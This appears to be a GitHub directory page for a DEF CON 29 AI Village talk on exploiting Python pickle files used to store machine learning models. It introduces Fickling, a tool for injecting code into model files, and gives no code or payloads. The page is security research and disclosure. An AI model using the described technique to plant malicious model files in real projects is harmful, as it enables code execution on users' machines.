Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
title Never a Dill Moment: Exploiting Machine Learning Pickle Files
date 2021-08
authors
Carson Harmon
Evan Sultanik
Jim Miller
Suha Hussain
conference
AI Village at DEF CON 29
resources
label path
Slides
DEFCON AI Village Fickling Talk.pdf

Machine learning models are often stored as Python pickle files because they conserve memory, enable start-and-stop model training, and can be easily shared. However, pickle files are vulnerable to arbitrary code execution attacks when they are deserialized from an untrusted source. This talk covers research on model-sharing services like PyTorch Hub and introduces Fickling, an open-source decompiler and code-injection tool. Fickling allows penetration testers and red teamers to create malicious model files that can attack machine learning frameworks like PyTorch and SpaCy, demonstrating the wide variety of attacks made possible by the inherently vulnerable design of pickle files.